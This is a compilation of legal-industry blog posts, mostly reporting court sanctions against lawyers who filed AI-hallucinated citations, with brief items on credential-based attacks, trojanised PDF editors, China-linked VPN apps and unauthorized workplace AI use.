In another “hard lesson learned” case, on Monday, February 24, 2025, a federal district court sanctioned three lawyers from the national law firm Morgan & Morgan for citing artificial intelligence (AI)-generated fake cases in motions in limine. Of the nine cases cited in the motions, eight were non-existent.

Although two of the lawyers were not involved in drafting the motions, all three e-signed the motions before they were filed. The lawyer who drafted the motions admitted, after the defense counsel raised issues to the court concerning the cited cases, that they used MX2.law to add case law to the motions. MX2.law is “an in-house database launched by” Morgan & Morgan. The lawyer admitted to the court that it was their first time using AI in this way. Unfortunately, they failed to verify the accuracy of the AI platform’s output before filing the motions.

To Morgan & Morgan’s credit, they withdrew the motions, were forthcoming to the court, reimbursed the defendant for attorney’s fees, and implemented “policies, safeguards, and training to prevent another [such]occurrence in the future.”

The court sanctioned all three lawyers. The attorney who drafted the motions and failed to verify the output was sanctioned $3,000 and the other two who e-filed the motions were sanctioned $1,000 each. A hard lesson learned, although by now all attorneys should be aware of the risks of using generative AI tools for assistance with writing pleadings. This is not the first hard lesson learned by an attorney who cited fake cases in a court filing. Check the output of any AI-generated material, whether it is in a court filing or not. In the words of the sanctioning court: “As attorneys transition to the world of AI, the duty to check their sources and make a reasonable inquiry into existing law remains unchanged.”

Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results showed that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees on an ongoing basis of how important it is to protect their usernames and passwords and to be highly vigilant when being asked to divulge them.

According to the Report, more than 68% of reported incidents were identity-based: where a threat actor attempts to use an authorized user’s credentials to access a company’s network. Many used agents that the organization did not authorize, a clear indication that it was not the authorized user trying to logon. In addition, 12% of incidents involved a logon from a suspicious location, showing that companies may wish to monitor and block any logon attempts from unauthorized locations, including foreign countries.

The Report notes that “fake PDF editors continue to be a major problem.” If a user does not have access to a company sanctioned PDF editor, users may search on the Internet for one to assist with editing a PDF to make a project easier. If a user downloads a fake PDF editor like SupremePDF, the user is unaware that the fake PDF editor can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”

According to Expel,

these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.

Once the threat actor downloads the second payload, it can then move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along to users as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.

If you haven’t scheduled your cybersecurity annual training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.

In a strongly worded order, Judge Julie A. Robinson of the U.S. District Court for the District of Kansas publicly admonished and sanctioned four lawyers representing a plaintiff company in a patent infringement case for using ChatGPT to find caselaw to support a response to a motion to exclude an expert witness, and a response to the defendant’s motion for summary judgment.

In the 36-page order, the court made it clear that not only the lawyer who used AI to generate the hallucinated citations, but also his partners and local counsel bore responsibility for the filing of the motion. This is a clear reminder of the non-delegable duty of lawyers under Rule 11 of the Federal Rules of Civil Procedure. The Court held that “[b]ecause there is no dispute that all five . . . attorneys signed both documents that included these errors, and they admit that not one of them verified that the case law in those briefs actually exist and stand for the propositions for which they were cited, their conduct violates Rule 11(b)(2).”

The brief facts are that a seasoned lawyer admitted pro hac vice before the court that the prepared motion was created using ChatGPT, and he admitted that it was his first time doing so. He was under stress personally and admitted he was not thinking straight, and although he meant to check the citations before filing the motion, he never did. His partners, although also admitted pro hac vice, were not responsible for the motion, never read it, and did not participate in its preparation. The associate assigned to the case read the motion, made a few changes, but was not assigned to check the citations. The local counsel relied on the pro hac vice counsel and reviewed it briefly before filing it but never checked the citations. The court’s order points out that the response to the motion to exclude “contains a litany of problems: (1) nonexistent quotations; (2) nonexistent and incorrect citations; and (3) misrepresentations about cited authority.” Some of the same issues were included in the response to the motion for summary judgment.

Here’s what the court had to say about each of the attorneys’ responsibilities and the sanctions it assessed:

  • The most culpable lawyer used ChatGPT and failed to check the citations. Although he was experiencing difficulties in his personal life, he never asked for an extension or help from the other five lawyers representing the plaintiff in the case. Instead, he filed the motion on time, cut corners by using ChatGPT and filed a response that included the deficiencies above. Neither his co-counsel nor his client were aware of the generative AI use. He was a “novice” at using it and is only now aware of the risks. Although the court was sympathetic to his personal plight (and he graciously emphasized that he was the only one culpable), the court stated that “citing to a nonexistent case, attributing a nonexistent quotation to an existing case, and misstating the law violates Rule 11(b).” The violation is the failure to verify the cases, not the intent behind the failure. The court noted that the attorney’s unawareness of the “very real risk of case hallucinations,” after several instances of Rule 11 sanctions being levied against lawyers for this same violation was an aggravating fact. The court directed the attorney to implement a robust policy to “deter any future instance of submitting unverified authority in a filing…[by requiring] him to submit to the Clerk for filing a certificate outlining specific internal procedures at his firm that he intends to impose. . . and imposes a monetary fine of $5,000, . . .and revokes his pro hac vice admission to this Court.” The court further directed the attorney to “self-report to the state disciplinary authorities where he is licensed by providing them with a copy of this Order.”
  • The attorney’s partners, who did not participate in brief preparations, signed the filing despite failing to determine the accuracy of the contents. One of the partners assigned an associate to help and was on a family vacation when it was filed. The court pointed out that merely affixing their names to the brief without reviewing it, “violated [their] duty to conduct a reasonably inquiry into the facts and the law before filing.” The court reiterated that Rule 11 is non-delegable and imposed a fine of $3,000 for each of the co-counsel who signed the pleadings.
  • The court did not sanction the associate assigned to the case, as he had no supervisory authority and “was placed in a difficult position by his supervising attorneys.”
  • As for local counsel, he also signed the defective pleadings, and “by doing so, he vouched for the Texas attorneys in this matter.” He failed to cite-check them. The firm set forth its efforts to ensure this doesn’t happen again and provided the court with a formal policy around generative AI use, and the attorney “voluntarily sanctioned himself in the form of refraining from serving as sponsoring or local counsel for pro hac vice attorneys for a period of 12 months.” With the above considerations, the court sanctioned the local counsel $1,000.

The clear takeaway is that firms need to address the fact that lawyers may be tempted to use GenAI even when they have no experience, know or don’t know of the consequences, and are addressing personal issues. Judges have no sympathy when it comes to hallucinations and misrepresentations in briefs, as it is a waste of time and resources, and is a clear violation of Rule 11. Ignorance is not a defense, and relying on your partners, co-counsel, or local counsel will not get you off the hook, as Rule 11 is non-delegable. Firms may wish to consider adopting policies and guidance for attorneys on the use of GenAI tools, requiring all lawyers who are signing pleadings to be responsible for checking and verifying cites before affixing their signature to a pleading. There can be no reliance on others before a pleading is filed.

Continuing the weekly blog posts about lawyers using AI and getting in trouble, the Massachusetts Office of Bar Counsel recently issued an article entitled “Two Years of Fake Cases and the Courts are Ratcheting Up the Sanctions,” summarizing the problems encountered by courts when confronted with lawyers citing fake cases, and the subsequent referral to disciplinary counsel.

The article outlines multiple cases of lawyers being sanctioned for filing pleadings containing fake cases after using generative AI tools to draft the pleading. The cases range from lawyers not checking the cites themselves, to supervising lawyers not checking the cites of lawyers they are supervising before filing the pleading.

The article reiterates our professional ethical obligations as officers of the court to always file pleadings that “to the best of the attorney’s knowledge, information and belief, there is a good ground to support it,” that “any lawyer who signs, files, submits, or later advocates for any pleading, motion or other papers is responsible for its content,” and that lawyers are to provide proper supervision to subordinate lawyers and nonlawyers.

The article outlines two recent sanctions imposed upon lawyers in Massachusetts in 2025. The author states, “Massachusetts practitioners would be well-served to read the sanction orders in these matters.” I would suggest that non-Massachusetts practitioners should read the article and the sanctions imposed as they are similar to what other courts are imposing on lawyers who are not checking the content and cites of the pleadings before filing them.

Courts are no longer giving lawyers free passes for being unaware of the risk of using generative AI tools for drafting pleadings. According to the article, sanctions will continue be issued, and practitioners and firms need to address the issue head on.

The article points out several mitigations that lawyers and firms can take to avoid sanctions. My suggestion is that lawyers use caution when using AI to draft pleadings, communicate with any other lawyers involved in drafting the pleadings to determine whether AI is being used (including if you are serving as local counsel), and check and re-check every cite before you file a pleading with a court.

U.S. District Judge Amit P. Mehta sanctioned an attorney who filed a brief containing erroneous citations in every case cited after the attorney admitted to relying on generative AI to write the brief. The attorney had used the tools Grammarly, ProWriting Aid, and Lexis’ cite-checking tool. The attorney was ordered to pay sanctions, including opposing counsel’s invoice for fees and costs. The court noted that sanctions were necessary because the attorney had acted “recklessly and shown “singularly egregious conduct” because they did not verify the citations and the citations of all nine cases cited were erroneous. The court further noted that the lack of verification raised “serious ethical concerns.”

The attorney’s co-counsel was not sanctioned as they indicated they were unaware of the use of generative AI, but they admitted that they didn’t independently check and verify the citations and underwent questioning by the court.

The sanctioned attorney self-reported the incident to the Pennsylvania Disciplinary Board and filed a motion to withdraw from the case.

This is a hard lesson to learn: it is not the first time an attorney has been sanctioned by a court for filing hallucinated citations. The message in all of the cases is that attorneys have an ethical obligation to check every cite before filing a pleading with the court, and extreme caution should be taken when using generative AI tools in the brief writing process.

Similarly, Senator Chuck Grassley, Chairman of the U.S. Senate Judiciary Committee, sent letters to two federal judges this week requesting information about their use of generative AI in drafting orders in cases. According to Grassley, original orders entered by the judges in July in separate cases were withdrawn after lawyers noted that factual inaccuracies and other errors were contained in the orders. Grassley noted that lawyers are facing scrutiny over the use of generative AI, and therefore judges should be held to the same or higher standard.

The judges have not responded to date.

The same lessons learned from attorneys using generative AI tools may wish to be considered by courts and their law clerks. Proceed with caution.

In the ongoing saga of lawyers who are sanctioned for AI generated hallucination citations in pleadings , FIFA (and other defendants) in an antitrust lawsuit filed by the Puerto Rico Soccer League in Puerto Rico, recently obtained an order from Chief U.S. District Judge Raul M. Arias-Marxuach requiring counsel for the plaintiff defunct league to pay FIFA and the other defendants $24,000 in attorney’s fees and costs “for filing briefs that appeared to contain errors hallucinated by artificial intelligence.” Puerto Rico Soccer League NFP, Corp. v. Federacion Puertoriquena de Futbol, No, 23-1203 (D.P.R. 9.23.25)

The judge noted that the motions filed by the Puerto Rico Soccer League “included at least 55 erroneous citations ‘requiring hours of work on the court’s end to check the accuracy of each citation.’ Plaintiffs’ counsel denied using generative AI, but this assertion was questioned by the judge by “the sheer number of inaccurate or nonexistent citations.”  The judge noted that the citations were violations of Rule 11 of the Federal Rules of Civil Procedure and applicable ethical rules.

The ordered sanctions are another reminder to lawyers to check and recheck all cases cited in any pleading filed to comply with Rule 11.

Researchers at Arizona State University and Citizen Lab have discovered that three families of Android VPN applications, used by millions of people worldwide, are related and owned by companies or individuals located in mainland China or Hong Kong with ties to the People’s Republic of China.

The researchers analyzed numerous VPN apps and the number of Google Play Store downloads, including the Java code and security flaws of each app. From their research, they identified three families of VPN providers and the number of downloads. The apps in the first group contained identical security flaws, including that they:

  • Collect location-related data (even though their privacy policies say they don’t);
  • Use weak/deprecated encryption; and
  • Contain hard-coded Shadowsocks passwords, which if extracted, may allow attackers to decrypt user traffic. These hard-coded credentials work across different apps and servers, proving that these providers use the same backend infrastructure.

They found a single company hosts all of the VPN servers in the second group, and that the VPN apps in the third family “are susceptible to connection interference attacks using the client-side blind in/on-path attacks.”

Significantly, the researchers found that “the providers appear to be owned and operated by a Chinese company (i.e., Qihoo 360) and have gone to great lengths to hide this fact from their 700+ million combined user bases.”

The Tech Transparency Project (TTP) provided an in-depth analysis of Qihoo 360 as a national security threat in its article “Apple Offers Apps With Ties to Chinese Military,” that is well worth the read.

According to the article, “[m]illions of Americans have downloaded apps that secretly route their internet traffic through Chinese companies, according to an investigation by the Tech Transparency Project (TTP), including several that were recently owned by a sanctioned firm with links to China’s military.” They discovered that “one in five of the top 100 free virtual private networks in the U.S. App Store during 2024 were surreptitiously owned by Chinese companies, which are obliged to hand over their users’ browsing data to the Chinese government under the country’s national security laws. Several of the apps traced back to Qihoo 360, a firm declared by the Defense Department to be a ‘Chinese Military Company.’”

They further found that “one Chinese VPN has been advertised on Facebook and Instagram to teens as young as 13, and some have targeted ads at Americans looking to keep using TikTok, another Chinese app threatened with a U.S. ban.”

While the researchers from Arizona State University and Citizen Lab did an in-depth analysis of the apps owned by Qihoo 360 (which found that the apps were downloaded over 70 million times), TTP provides more information about Qihoo 360 and its national security risk. According to TTP, Qihoo 360 was placed on the Commerce Department’s Entity List. It was sanctioned in June 2020 as it “takes part in the procurement of commodities and technologies for military end-use in China.” It was also “designated by the U.S. Department of Defense as a ‘Chinese military company’ operating in the U.S.”

Similar to the concerns raised by TikTok and Temu, the free VPN services provided by Qihoo contain risks that users should consider. Research your VPN provider to ensure that it does not have ties to the Chinese Communist government.

We have previously outlined several cases where lawyers have been sanctioned by courts for citing fake cases generated by artificial intelligence (AI), also known as “hallucinations.”

Now, we don’t even have to keep track of the cases to report on them because we found a nifty new database that keeps track of all of them. Did you know that as of this writing, there have been 156 cases where lawyers cited fake cases generated by AI in court documents?

It is hard to believe that with Rule 11 obligations, any lawyer would file a document with a court without checking the cite. Apparently, it happens more frequently than one would think. Many lawyers have already been sanctioned by courts to send the message that citing fake cases generated by AI is a waste of the court’s time, as well as a waste of the time and resources of opposing counsel and parties.

Kudos to Damien Charlotin, who has created a database to track the growing number of cases where lawyers have cited AI generated hallucinated cases. If you want to see how it is a growing problem, check it out.

The cases grow, and the sanctions continue to get larger and more punitive. Lawyers need to quickly learn that they must follow their ethical obligations and provide actual cases, with citations checked and shepardized with human oversight, before filing a pleading. It is truly shocking that lawyers have failed to do so in 156 instances thus far.

A new survey from Intapp, titled “2025 Tech Perceptions Survey Report,” summarizes findings from a survey of fee-earners that there has been a “surge in AI usage.” The professions surveyed included accounting, consulting, finance, and legal sectors. Findings include that “AI usage among professionals has grown substantially, with 72% using AI at work versus 48% in 2024.” AI adoption among firms increased to 56%, with firms utilizing it for data summarization, document generation, research, error-checking, quality control, voice queries, data entry, consultation (decision-making support), and recommendations. That said, the vast majority of AI adoption in the four sectors is in finance, with 89% of professionals using AI at work. Specifically, 73% of accounting professionals, 68% of consulting professionals, and 55% of legal professionals use AI.

A significant conclusion is that when firms do not provide AI tools for professionals to use, they often develop their own. Over 50% of professionals have used unauthorized AI tools in the workplace, which increases risk for companies. They are reallocating the time saved with AI tools by improving work-life balance, focusing on higher-level client work, focusing on strategic initiatives and planning, cultivating relationships with clients, and increasing billable hours.

The survey found that professionals want and need technology to assist with tasks. Only 32% of professionals believe they have the optimal technology to complete their job effectively. The conclusion is that professionals who are given optimal technology to perform their jobs are more satisfied and likely to stay at the firm, optimal tech “powers professional-and firm-success, and AI is becoming non-negotiable for future firm leaders.”

AI tools are rapidly developing and adopted by all industries, including professional sectors. As noted in the Intapp survey, if firms are not providing AI tools for workers to use to enhance their jobs, they will use them anyway. The survey reiterates how important it is to have an AI Governance Program in place to provide sanctioned tools for workers to reduce the risks associated with using unauthorized AI tools. Developing and implementing an AI Governance Program and acceptable use policies should be high on the priority list for all industries, including professional services.

A new study by Ivanti illustrates that one out of three workers secretly use artificial intelligence (AI) tools in the workplace. They do so for varying reasons, including “I like a secret advantage,” “My job might be reduced/cut,” “My employer has no AI usage policy,” “My boss might give me more work,” “I don’t want people to question my ability,” and “I don’t want to deal with IT approval processes.”

In 2025, a staggering 42% of employees admit to using generative AI (GenAI) tools at work. Another whopping 48% of employees admit to feeling resenteeism (a dislike of one’s job, but stays anyway) and 39% admit to feeling presenteeism (when one comes into the office to be seen, but is not productive).

The secret use of GenAI tools in the workplace poses several risks for organizations, including unauthorized disclosure of company data and/or personal information, cybersecurity risks, bias and discrimination, and misappropriation of intellectual property.

The Ivanti study emphasizes the need for organizations to adopt an AI Governance Program so employees feel comfortable using approved and sanctioned AI tools and don’t keep their use a secret. It also allows the organization to monitor the use of AI tools by employees and implement guidelines and guardrails around their safe use in the organization to reduce risk.